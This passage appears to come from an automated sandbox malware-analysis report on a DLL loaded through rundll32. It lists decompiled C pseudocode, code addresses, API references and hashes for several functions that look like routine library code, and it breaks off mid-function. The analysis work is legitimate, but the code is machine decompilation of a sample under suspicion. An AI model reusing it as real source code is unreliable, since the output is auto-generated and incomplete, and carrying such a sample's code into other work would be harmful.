                                                                                                            • ReleaseDC.USER32 ref: 1001237F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                            • String ID: System
                                                                                                            • API String ID: 46613423-3470857405
                                                                                                            • Opcode ID: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
                                                                                                            • Instruction ID: 49ddb338abe5c97598327bd9655a3bb67b407c313b2becf61478e8986669c503
                                                                                                            • Opcode Fuzzy Hash: f7306e7935f5abbcbdc9fefcc9670ce0ed1cf25eefe840699117e3069a8def3f
                                                                                                            • Instruction Fuzzy Hash: 9B1182B1600328AFEB14DBA0CC89FAE77B8EB49781F014015F601EE1D1DB749E418B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001D204 Relevance: 13.8, APIs: 9, Instructions: 253stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E1001D204(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t121;
				int _t122;
				CHAR* _t127;
				CHAR* _t135;
				CHAR* _t140;
				signed short* _t142;
				CHAR* _t144;
				CHAR* _t148;
				CHAR* _t151;
				signed int _t158;
				signed int _t169;
				CHAR* _t173;
				void* _t176;
				void* _t179;
				signed short _t181;
				signed int _t183;
				intOrPtr _t185;
				CHAR* _t188;
				int _t190;
				char* _t193;
				void* _t194;
				void* _t195;
				CHAR* _t196;
				char* _t198;
				void* _t199;
				long long _t204;

				_t199 = __eflags;
				_t185 = __edx;
				_push(0x50);
				E1001FC63(E100348FF, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t195 - 0x34)) = __ecx;
				E1000EC55(_t195 - 0x30, _t199,  *((intOrPtr*)(__ecx + 0x1c)));
				_t173 =  *(_t195 + 8);
				_t121 = _t173[8];
				_t187 = 0;
				 *(_t195 - 4) = 0;
				 *(_t195 - 0x1d) = 0;
				 *(_t195 - 0x18) = _t121;
				if(_t121 == 0) {
					 *(_t195 - 0x18) = _t195 - 0x1d;
				}
				_t122 = lstrlenA( *(_t195 - 0x18));
				_t201 =  *(_t195 + 0xc) & 0x0000000c;
				_t190 = _t122;
				 *(_t195 - 0x28) = _t173[0x10];
				 *(_t195 - 0x24) = _t173[0xc] & 0x0000ffff;
				if(( *(_t195 + 0xc) & 0x0000000c) == 0) {
					L11:
					_t191 =  *(_t195 + 0x14);
					_push( *(_t191 + 8) << 4);
					_t127 = E100010EE(_t173, _t185, _t187, _t191, __eflags);
					__eflags = _t127;
					_pop(_t176);
					if(_t127 != 0) {
						_t191 =  *(_t191 + 8);
						__eflags = _t191 - 0x7ffffff;
						if(_t191 > 0x7ffffff) {
							goto L12;
						}
						_t192 = _t191 << 4;
						E100203C0(_t191 << 4);
						 *(_t195 - 0x10) = _t196;
						 *(_t195 - 0x1c) = _t196;
						E10020F40(_t187,  *(_t195 - 0x1c), _t187, _t191 << 4);
						_t198 =  &(_t196[0xc]);
						_t187 = E1001C9FD(_t176, _t187, _t192,  *(_t195 - 0x18),  *(_t195 - 0x24));
						_t49 = _t187 + 0x10; // 0x10
						_t191 = _t49;
						_push(_t49);
						_t135 = E100010EE(_t173, _t185, _t187, _t49, __eflags);
						__eflags = _t135;
						if(_t135 == 0) {
							L4:
							 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
							if( *(_t195 - 0x2c) == 0) {
								L7:
								L55:
								return E1001FCBF(_t173, _t187, _t191);
							}
							_push( *((intOrPtr*)(_t195 - 0x30)));
							_push(0);
							L6:
							E1000E519();
							goto L7;
						}
						E100203C0(_t191);
						 *(_t195 - 0x10) = _t198;
						_t173 = 0;
						_t193 = _t198;
						 *((intOrPtr*)(_t195 - 0x58)) = 0x10038ec0;
						 *((intOrPtr*)(_t195 - 0x54)) = 0;
						 *((intOrPtr*)(_t195 - 0x48)) = 0;
						 *((intOrPtr*)(_t195 - 0x4c)) = 0;
						 *((intOrPtr*)(_t195 - 0x50)) = 0;
						_push(_t195 - 0x58);
						_push( *(_t195 - 0x1c));
						_push( *((intOrPtr*)(_t195 + 0x18)));
						 *(_t195 - 4) = 1;
						_push( *(_t195 + 0x14));
						_push( *(_t195 - 0x24));
						_push(_t195 - 0x44);
						_push( *(_t195 - 0x18));
						_push(_t193);
						_t140 = E1001CF1C(0,  *((intOrPtr*)(_t195 - 0x34)), _t187, _t193, __eflags);
						__eflags = _t140;
						 *(_t195 - 0x18) = _t140;
						if(_t140 != 0) {
							L26:
							_t191 =  *(_t195 + 0x14);
							_t187 = 0;
							__eflags =  *(_t191 + 8);
							if( *(_t191 + 8) <= 0) {
								L29:
								__eflags =  *(_t195 - 0x18);
								_t179 = _t195 - 0x58;
								if( *(_t195 - 0x18) == 0) {
									E1001CDAE(_t179);
									_t142 =  *(_t195 + 0x10);
									__eflags = _t142;
									if(_t142 == 0) {
										_t144 = ( *(_t195 - 0x24) & 0x0000ffff) - 8;
										__eflags = _t144;
										if(_t144 == 0) {
											__imp__#6(_t173);
											L52:
											 *(_t195 - 4) = 0;
											E1001CE04(_t195 - 0x58);
											 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
											__eflags =  *(_t195 - 0x2c);
											if( *(_t195 - 0x2c) != 0) {
												_push( *((intOrPtr*)(_t195 - 0x30)));
												_push(0);
												E1000E519();
											}
											__eflags = 0;
											goto L55;
										}
										_t148 = _t144 - 1;
										__eflags = _t148;
										if(_t148 == 0) {
											L48:
											__eflags = _t173;
											if(_t173 != 0) {
												 *((intOrPtr*)( *_t173 + 8))(_t173);
											}
											goto L52;
										}
										_t151 = _t148 - 3;
										__eflags = _t151;
										if(_t151 == 0) {
											__imp__#9(_t195 - 0x44);
											goto L52;
										}
										__eflags = _t151 != 1;
										if(_t151 != 1) {
											goto L52;
										}
										goto L48;
									}
									_t181 =  *(_t195 - 0x24);
									 *_t142 = _t181;
									_t183 = (_t181 & 0x0000ffff) + 0xfffffffe;
									__eflags = _t183 - 0x13;
									if(_t183 > 0x13) {
										goto L52;
									}
									switch( *((intOrPtr*)(_t183 * 4 +  &M1001D514))) {
										case 0:
											L41:
											 *(__eax + 8) = __bx;
											goto L52;
										case 1:
											 *(__eax + 8) = __ebx;
											goto L52;
										case 2:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 3:
											 *(__eax + 8) =  *(__ebp - 0x44);
											goto L52;
										case 4:
											__ecx =  *(__ebp - 0x44);
											 *(__eax + 8) =  *(__ebp - 0x44);
											__ecx =  *(__ebp - 0x40);
											 *(__eax + 0xc) = __ecx;
											goto L52;
										case 5:
											__bx =  ~__bx;
											asm("sbb ebx, ebx");
											goto L41;
										case 6:
											__esi = __ebp - 0x44;
											__edi = __eax;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
											goto L52;
										case 7:
											goto L52;
										case 8:
											_t142[4] = _t173;
											goto L52;
									}
								}
								 *(_t195 - 4) = 0;
								E1001CE04(_t179);
								 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
								__eflags =  *(_t195 - 0x2c);
								if( *(_t195 - 0x2c) != 0) {
									_push( *((intOrPtr*)(_t195 - 0x30)));
									_push(0);
									E1000E519();
								}
								goto L55;
							}
							do {
								__imp__#9( *(_t195 - 0x1c));
								 *(_t195 - 0x1c) =  &(( *(_t195 - 0x1c))[0x10]);
								_t187 = _t187 + 1;
								__eflags = _t187 -  *(_t191 + 8);
							} while (_t187 <  *(_t191 + 8));
							goto L29;
						}
						_t158 =  *(_t195 - 0x24) & 0x0000ffff;
						__eflags = _t158 - 4;
						_push(_t187);
						_push(_t193);
						_push( *(_t195 - 0x28));
						 *(_t195 - 4) = 2;
						if(_t158 == 4) {
							E1001E78B();
							 *((intOrPtr*)(_t195 - 0x34)) = _t204;
							 *((intOrPtr*)(_t195 - 0x44)) =  *((intOrPtr*)(_t195 - 0x34));
							L25:
							 *(_t195 - 4) = 1;
							goto L26;
						}
						__eflags = _t158 - 5;
						if(_t158 == 5) {
							L23:
							E1001E78B();
							 *((long long*)(_t195 - 0x44)) = _t204;
							goto L25;
						}
						__eflags = _t158 - 7;
						if(_t158 == 7) {
							goto L23;
						}
						__eflags = _t158 + 0xffffffec - 1;
						if(_t158 + 0xffffffec > 1) {
							_t173 = E1001E78B();
						} else {
							 *((intOrPtr*)(_t195 - 0x44)) = E1001E78B();
							 *((intOrPtr*)(_t195 - 0x40)) = _t185;
						}
						goto L25;
					}
					L12:
					 *(_t195 - 4) =  *(_t195 - 4) | 0xffffffff;
					__eflags =  *(_t195 - 0x2c) - _t187;
					if( *(_t195 - 0x2c) == _t187) {
						goto L7;
					}
					_push( *((intOrPtr*)(_t195 - 0x30)));
					_push(_t187);
					goto L6;
				}
				_t19 = _t190 + 3; // 0x3
				_t187 = _t19;
				_push(_t19);
				if(E100010EE(_t173, _t185, _t19, _t190, _t201) != 0) {
					E100203C0(_t187);
					 *(_t195 - 0x10) = _t196;
					_t188 = _t196;
					_t26 = _t190 + 3; // 0x3
					E10005007(_t188, _t190, _t195, _t188, _t26,  *(_t195 - 0x18), _t190);
					_t169 = _t173[0xc] & 0x0000ffff;
					_t196 =  &(_t196[0x10]);
					__eflags = _t169 - 8;
					 *(_t195 - 0x18) = _t188;
					if(_t169 == 8) {
						_t169 = 0xe;
					}
					 *(_t195 - 0x24) =  *(_t195 - 0x24) & 0x00000000;
					_t188[_t190] = 0xff;
					_t194 = _t190 + 1;
					_t188[_t194] = _t169;
					_t188[_t194 + 1] = 0;
					 *(_t195 - 0x28) = _t173[0x14];
					_t187 = 0;
					__eflags = 0;
					goto L11;
				}
				goto L4;
			}





























                                                                                                            0x1001d204
                                                                                                            0x1001d204
                                                                                                            0x1001d204
                                                                                                            0x1001d20b
                                                                                                            0x1001d210
                                                                                                            0x1001d219
                                                                                                            0x1001d21e
                                                                                                            0x1001d221
                                                                                                            0x1001d224
                                                                                                            0x1001d228
                                                                                                            0x1001d22b
                                                                                                            0x1001d22f
                                                                                                            0x1001d232
                                                                                                            0x1001d237
                                                                                                            0x1001d237
                                                                                                            0x1001d23d
                                                                                                            0x1001d243
                                                                                                            0x1001d247
                                                                                                            0x1001d24c
                                                                                                            0x1001d253
                                                                                                            0x1001d256
                                                                                                            0x1001d2ca
                                                                                                            0x1001d2ca
                                                                                                            0x1001d2d3
                                                                                                            0x1001d2d4
                                                                                                            0x1001d2d9
                                                                                                            0x1001d2db
                                                                                                            0x1001d2dc
                                                                                                            0x1001d2ed
                                                                                                            0x1001d2f0
                                                                                                            0x1001d2f6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d2f8
                                                                                                            0x1001d2fd
                                                                                                            0x1001d302
                                                                                                            0x1001d305
                                                                                                            0x1001d30d
                                                                                                            0x1001d312
                                                                                                            0x1001d320
                                                                                                            0x1001d322
                                                                                                            0x1001d322
                                                                                                            0x1001d325
                                                                                                            0x1001d326
                                                                                                            0x1001d32b
                                                                                                            0x1001d32e
                                                                                                            0x1001d266
                                                                                                            0x1001d266
                                                                                                            0x1001d26e
                                                                                                            0x1001d27a
                                                                                                            0x1001d507
                                                                                                            0x1001d50f
                                                                                                            0x1001d50f
                                                                                                            0x1001d270
                                                                                                            0x1001d273
                                                                                                            0x1001d275
                                                                                                            0x1001d275
                                                                                                            0x00000000
                                                                                                            0x1001d275
                                                                                                            0x1001d336
                                                                                                            0x1001d33b
                                                                                                            0x1001d33e
                                                                                                            0x1001d340
                                                                                                            0x1001d342
                                                                                                            0x1001d349
                                                                                                            0x1001d34c
                                                                                                            0x1001d34f
                                                                                                            0x1001d352
                                                                                                            0x1001d35b
                                                                                                            0x1001d35c
                                                                                                            0x1001d362
                                                                                                            0x1001d365
                                                                                                            0x1001d369
                                                                                                            0x1001d36c
                                                                                                            0x1001d36f
                                                                                                            0x1001d370
                                                                                                            0x1001d373
                                                                                                            0x1001d374
                                                                                                            0x1001d379
                                                                                                            0x1001d37b
                                                                                                            0x1001d37e
                                                                                                            0x1001d3d9
                                                                                                            0x1001d3d9
                                                                                                            0x1001d3dc
                                                                                                            0x1001d3de
                                                                                                            0x1001d3e1
                                                                                                            0x1001d3fc
                                                                                                            0x1001d3fc
                                                                                                            0x1001d400
                                                                                                            0x1001d403
                                                                                                            0x1001d450
                                                                                                            0x1001d455
                                                                                                            0x1001d458
                                                                                                            0x1001d45a
                                                                                                            0x1001d4b6
                                                                                                            0x1001d4b6
                                                                                                            0x1001d4b9
                                                                                                            0x1001d4df
                                                                                                            0x1001d4e5
                                                                                                            0x1001d4e8
                                                                                                            0x1001d4ec
                                                                                                            0x1001d4f1
                                                                                                            0x1001d4f5
                                                                                                            0x1001d4f9
                                                                                                            0x1001d4fb
                                                                                                            0x1001d4fe
                                                                                                            0x1001d500
                                                                                                            0x1001d500
                                                                                                            0x1001d505
                                                                                                            0x00000000
                                                                                                            0x1001d505
                                                                                                            0x1001d4bb
                                                                                                            0x1001d4bb
                                                                                                            0x1001d4bc
                                                                                                            0x1001d4c6
                                                                                                            0x1001d4c6
                                                                                                            0x1001d4c8
                                                                                                            0x1001d4cd
                                                                                                            0x1001d4cd
                                                                                                            0x00000000
                                                                                                            0x1001d4c8
                                                                                                            0x1001d4be
                                                                                                            0x1001d4be
                                                                                                            0x1001d4c1
                                                                                                            0x1001d4d6
                                                                                                            0x00000000
                                                                                                            0x1001d4d6
                                                                                                            0x1001d4c3
                                                                                                            0x1001d4c4
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d4c4
                                                                                                            0x1001d45c
                                                                                                            0x1001d45f
                                                                                                            0x1001d465
                                                                                                            0x1001d468
                                                                                                            0x1001d46b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d46d
                                                                                                            0x00000000
                                                                                                            0x1001d49c
                                                                                                            0x1001d49c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d4ad
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d48a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d492
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d479
                                                                                                            0x1001d47c
                                                                                                            0x1001d47f
                                                                                                            0x1001d482
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d497
                                                                                                            0x1001d49a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d4a2
                                                                                                            0x1001d4a5
                                                                                                            0x1001d4a7
                                                                                                            0x1001d4a8
                                                                                                            0x1001d4a9
                                                                                                            0x1001d4aa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d474
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d46d
                                                                                                            0x1001d405
                                                                                                            0x1001d409
                                                                                                            0x1001d40e
                                                                                                            0x1001d412
                                                                                                            0x1001d416
                                                                                                            0x1001d418
                                                                                                            0x1001d41b
                                                                                                            0x1001d41d
                                                                                                            0x1001d41d
                                                                                                            0x00000000
                                                                                                            0x1001d422
                                                                                                            0x1001d3e9
                                                                                                            0x1001d3ec
                                                                                                            0x1001d3f2
                                                                                                            0x1001d3f6
                                                                                                            0x1001d3f7
                                                                                                            0x1001d3f7
                                                                                                            0x00000000
                                                                                                            0x1001d3e9
                                                                                                            0x1001d380
                                                                                                            0x1001d384
                                                                                                            0x1001d387
                                                                                                            0x1001d388
                                                                                                            0x1001d389
                                                                                                            0x1001d38c
                                                                                                            0x1001d390
                                                                                                            0x1001d3c4
                                                                                                            0x1001d3c9
                                                                                                            0x1001d3cf
                                                                                                            0x1001d3d2
                                                                                                            0x1001d3d2
                                                                                                            0x00000000
                                                                                                            0x1001d3d2
                                                                                                            0x1001d392
                                                                                                            0x1001d395
                                                                                                            0x1001d3ba
                                                                                                            0x1001d3ba
                                                                                                            0x1001d3bf
                                                                                                            0x00000000
                                                                                                            0x1001d3bf
                                                                                                            0x1001d397
                                                                                                            0x1001d39a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d39f
                                                                                                            0x1001d3a2
                                                                                                            0x1001d3b6
                                                                                                            0x1001d3a4
                                                                                                            0x1001d3a9
                                                                                                            0x1001d3ac
                                                                                                            0x1001d3ac
                                                                                                            0x00000000
                                                                                                            0x1001d3a2
                                                                                                            0x1001d2de
                                                                                                            0x1001d2de
                                                                                                            0x1001d2e2
                                                                                                            0x1001d2e5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d2e7
                                                                                                            0x1001d2ea
                                                                                                            0x00000000
                                                                                                            0x1001d2ea
                                                                                                            0x1001d258
                                                                                                            0x1001d258
                                                                                                            0x1001d25b
                                                                                                            0x1001d264
                                                                                                            0x1001d286
                                                                                                            0x1001d28b
                                                                                                            0x1001d28e
                                                                                                            0x1001d294
                                                                                                            0x1001d299
                                                                                                            0x1001d29e
                                                                                                            0x1001d2a2
                                                                                                            0x1001d2a5
                                                                                                            0x1001d2a9
                                                                                                            0x1001d2ac
                                                                                                            0x1001d2b0
                                                                                                            0x1001d2b0
                                                                                                            0x1001d2b1
                                                                                                            0x1001d2b5
                                                                                                            0x1001d2b9
                                                                                                            0x1001d2ba
                                                                                                            0x1001d2bd
                                                                                                            0x1001d2c5
                                                                                                            0x1001d2c8
                                                                                                            0x1001d2c8
                                                                                                            0x00000000
                                                                                                            0x1001d2c8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch_GS.LIBCMT ref: 1001D20B
                                                                                                            • lstrlenA.KERNEL32(00000000,000000FF,00000050,10012995,00000000,00000001,?,?,000000FF,?,?,?), ref: 1001D23D
                                                                                                            • __alloca_probe_16.LIBCMT ref: 1001D286
                                                                                                              • Part of subcall function 10005007: _memcpy_s.LIBCMT ref: 10005017
                                                                                                            • __alloca_probe_16.LIBCMT ref: 1001D2FD
                                                                                                            • _memset.LIBCMT ref: 1001D30D
                                                                                                            • __alloca_probe_16.LIBCMT ref: 1001D336
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1001D3EC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: __alloca_probe_16$ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2586305615-0
                                                                                                            • Opcode ID: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
                                                                                                            • Instruction ID: 6804580c6d9db2e853958beb5b9c70fac7fcc155cdbb3eab0184ec39f158d97d
                                                                                                            • Opcode Fuzzy Hash: 7d36ba39bd72652906d95b9a6764dc008f6fb844193c5fed64fe356d7127ab0a
                                                                                                            • Instruction Fuzzy Hash: 2EA1AE35C00649DBDF11EFE4C885AAEBBB1FF04354F20415AE825AB291D774EE81DBA1
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010915 Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 91%
                                                                                                            			E10010915(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E1001FBF7(E10033B54, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					LeaveCriticalSection(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E100105C8(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x100384d0;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E100106E4( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E100010C9(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E100010C9(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E10004E3A(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E10020F40(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					LeaveCriticalSection( *(_t66 - 0x14));
				}
				return E1001FC9C(_t36);
			}














                                                                                                            0x10010915
                                                                                                            0x1001091c
                                                                                                            0x10010921
                                                                                                            0x10010923
                                                                                                            0x10010926
                                                                                                            0x1001092a
                                                                                                            0x1001092d
                                                                                                            0x10010933
                                                                                                            0x1001093a
                                                                                                            0x10010a3c
                                                                                                            0x10010949
                                                                                                            0x10010951
                                                                                                            0x10010955
                                                                                                            0x10010989
                                                                                                            0x1001098c
                                                                                                            0x10010991
                                                                                                            0x10010993
                                                                                                            0x1001099f
                                                                                                            0x1001099f
                                                                                                            0x10010995
                                                                                                            0x10010995
                                                                                                            0x1001099b
                                                                                                            0x1001099b
                                                                                                            0x100109a1
                                                                                                            0x100109a6
                                                                                                            0x100109a9
                                                                                                            0x100109ac
                                                                                                            0x100109af
                                                                                                            0x00000000
                                                                                                            0x10010957
                                                                                                            0x10010957
                                                                                                            0x1001095d
                                                                                                            0x1001096c
                                                                                                            0x1001096c
                                                                                                            0x1001096f
                                                                                                            0x100109d3
                                                                                                            0x100109d9
                                                                                                            0x100109de
                                                                                                            0x10010971
                                                                                                            0x10010976
                                                                                                            0x1001097c
                                                                                                            0x1001097f
                                                                                                            0x1001097f
                                                                                                            0x100109e4
                                                                                                            0x100109e6
                                                                                                            0x100109eb
                                                                                                            0x100109f1
                                                                                                            0x100109f1
                                                                                                            0x100109f9
                                                                                                            0x10010a0a
                                                                                                            0x10010a16
                                                                                                            0x10010a1b
                                                                                                            0x10010a21
                                                                                                            0x10010a21
                                                                                                            0x1001095d
                                                                                                            0x10010a24
                                                                                                            0x10010a29
                                                                                                            0x10010a33
                                                                                                            0x10010a33
                                                                                                            0x10010a3c
                                                                                                            0x10010a3c
                                                                                                            0x10010a47

                                                                                                            APIs
                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1001091C
                                                                                                            • EnterCriticalSection.KERNEL32(?,00000010,10010ACA,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD), ref: 1001092D
                                                                                                            • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 1001094B
                                                                                                            • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 1001097F
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 100109EB
                                                                                                            • _memset.LIBCMT ref: 10010A0A
                                                                                                            • TlsSetValue.KERNEL32(?,00000000,00000058,10003840), ref: 10010A1B
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001,?,100101BD,00000000), ref: 10010A3C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 1891723912-0
                                                                                                            • Opcode ID: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
                                                                                                            • Instruction ID: c7db6ee6c4a6de8547c75bf432caa67de510ee99b88e2ce085b1988c099b2997
                                                                                                            • Opcode Fuzzy Hash: ce974ed0f0f987bdcecbe95e2976648c49878f8f168887bcc8d6339403368800
                                                                                                            • Instruction Fuzzy Hash: 5431BC70600606AFE721DF10CC95C5ABBB5FF04350B61C52AF9869F562CBB1ED90CB91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10001395 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 104COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10001395(signed short* _a4, signed short* _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				void* _t31;
				void* _t34;
				signed int _t36;
				short* _t56;
				short* _t76;

				_t31 = E10001380(_a4);
				if(_t31 == E10001380(_a8)) {
